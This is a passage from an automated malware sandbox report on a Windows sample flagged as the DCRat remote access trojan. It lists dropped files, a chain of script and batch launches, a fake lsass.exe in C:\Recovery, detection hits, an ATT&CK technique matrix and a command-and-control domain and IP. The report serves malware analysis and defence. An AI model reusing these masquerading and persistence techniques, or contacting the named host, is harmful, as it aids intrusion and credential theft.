                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\lsass.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCF838
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCF9D5 SetUnhandledExceptionFilter,0_2_00BCF9D5
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BCFBCA
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD8EBD
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"Jump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe" Jump to behavior
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe" Jump to behavior
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
                                    Source: C:\Recovery\lsass.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCF654 cpuid 0_2_00BCF654
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00BCAF0F
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeQueries volume information: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe VolumeInformationJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00BCDF1E
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBB146 GetVersionExW,0_2_00BBB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ComponentBrowserruntimeHostNet.exe PID: 5296, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 1368, type: MEMORYSTR
                                    Source: Yara matchFile source: Qsi7IgkrWa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: Qsi7IgkrWa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ComponentBrowserruntimeHostNet.exe PID: 5296, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 1368, type: MEMORYSTR
                                    Source: Yara matchFile source: Qsi7IgkrWa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: Qsi7IgkrWa.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts2
                                    Command and Scripting Interpreter
                                    11
                                    Scripting
                                    11
                                    Process Injection
                                    113
                                    Masquerading
                                    OS Credential Dumping1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    1
                                    DLL Side-Loading
                                    1
                                    Disable or Modify Tools
                                    LSASS Memory121
                                    Security Software Discovery
                                    Remote Desktop ProtocolData from Removable Media2
                                    Ingress Tool Transfer
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                                    Virtualization/Sandbox Evasion
                                    Security Account Manager1
                                    Process Discovery
                                    SMB/Windows Admin SharesData from Network Shared Drive3
                                    Non-Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                    Process Injection
                                    NTDS31
                                    Virtualization/Sandbox Evasion
                                    Distributed Component Object ModelInput Capture13
                                    Application Layer Protocol
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information
                                    LSA Secrets1
                                    Remote System Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information
                                    Cached Domain Credentials1
                                    System Network Configuration Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                                    Software Packing
                                    DCSync3
                                    File and Directory Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading
                                    Proc Filesystem36
                                    System Information Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569639 Sample: Qsi7IgkrWa.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 89 595506cm.n9shka.top 2->89 99 Multi AV Scanner detection for domain / URL 2->99 101 Suricata IDS alerts for network traffic 2->101 103 Found malware configuration 2->103 105 14 other signatures 2->105 15 Qsi7IgkrWa.exe 3 6 2->15         started        signatures3 process4 file5 83 C:\...\ComponentBrowserruntimeHostNet.exe, PE32 15->83 dropped 85 RHmzYjMP0dDm1pBgOI...OJ2gOiG4vHIxjIg.vbe, data 15->85 dropped 18 wscript.exe 1 15->18         started        process6 signatures7 91 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->91 21 cmd.exe 1 18->21         started        process8 process9 23 ComponentBrowserruntimeHostNet.exe 3 21 21->23         started        27 conhost.exe 21->27         started        file10 67 C:\Users\user\Desktop\iAcIGVjp.log, PE32 23->67 dropped 69 C:\Users\user\Desktop\ZPkAsstD.log, PE32 23->69 dropped 71 C:\Users\user\Desktop\PgRkIPoV.log, PE32 23->71 dropped 73 7 other malicious files 23->73 dropped 107 Antivirus detection for dropped file 23->107 109 Multi AV Scanner detection for dropped file 23->109 111 Machine Learning detection for dropped file 23->111 113 Drops PE files with benign system names 23->113 29 cmd.exe 1 23->29         started        signatures11 process12 signatures13 117 Uses ping.exe to sleep 29->117 119 Uses ping.exe to check the status of other devices and networks 29->119 32 lsass.exe 14 10 29->32         started        37 conhost.exe 29->37         started        39 PING.EXE 1 29->39         started        41 chcp.com 1 29->41         started        process14 dnsIp15 87 595506cm.n9shka.top 37.44.238.250, 49734, 49737, 49738 HARMONYHOSTING-ASFR France 32->87 59 C:\Users\user\Desktop\vXhOtgDl.log, PE32 32->59 dropped 61 C:\Users\user\Desktop\gtMhCYIK.log, PE32 32->61 dropped 63 C:\Users\user\Desktop\QrHcjUSw.log, PE32 32->63 dropped 65 2 other malicious files 32->65 dropped 93 Antivirus detection for dropped file 32->93 95 Multi AV Scanner detection for dropped file 32->95 97 Machine Learning detection for dropped file 32->97 43 cmd.exe 1 32->43         started        file16 signatures17 process18 signatures19 115 Uses ping.exe to sleep 43->115 46 lsass.exe 9 43->46         started        49 conhost.exe 43->49         started        51 PING.EXE 1 43->51         started        53 chcp.com 1 43->53         started        process20 file21 75 C:\Users\user\Desktop\nPayaidT.log, PE32 46->75 dropped 77 C:\Users\user\Desktop\dhGiqFYl.log, PE32 46->77 dropped 79 C:\Users\user\Desktop\UynSGdTD.log, PE32 46->79 dropped 81 2 other malicious files 46->81 dropped 55 cmd.exe 46->55         started        process22 process23 57 conhost.exe 55->57         started       

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    Qsi7IgkrWa.exe71%ReversingLabsWin32.Trojan.Uztuby
                                    Qsi7IgkrWa.exe60%VirustotalBrowse
                                    Qsi7IgkrWa.exe100%AviraVBS/Runner.VPG
                                    Qsi7IgkrWa.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe100%AviraTR/Spy.Agent.qwlok
                                    C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\CmKYhHkf.log100%AviraTR/PSW.Agent.qngqt
                                    C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe100%AviraTR/Spy.Agent.qwlok
                                    C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\CKyWUHyH.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat100%AviraBAT/Delbat.C
                                    C:\HypercontainerServerhostDll\TextInputHost.exe100%AviraTR/Spy.Agent.qwlok
                                    C:\Users\user\Desktop\AFUvvHdz.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\GQmWAABO.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat100%AviraBAT/Delbat.C
                                    C:\Recovery\lsass.exe100%AviraTR/Spy.Agent.qwlok
                                    C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe100%AviraTR/Spy.Agent.qwlok
                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe100%AviraTR/Spy.Agent.qwlok
                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\CmKYhHkf.log100%Joe Sandbox ML
                                    C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe100%Joe Sandbox ML
                                    C:\HypercontainerServerhostDll\TextInputHost.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\HInMzsNO.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\AFUvvHdz.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JeCeCscc.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\GQmWAABO.log100%Joe Sandbox ML
                                    C:\Recovery\lsass.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\EaXPTOzT.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe100%Joe Sandbox ML
                                    C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\HypercontainerServerhostDll\TextInputHost.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
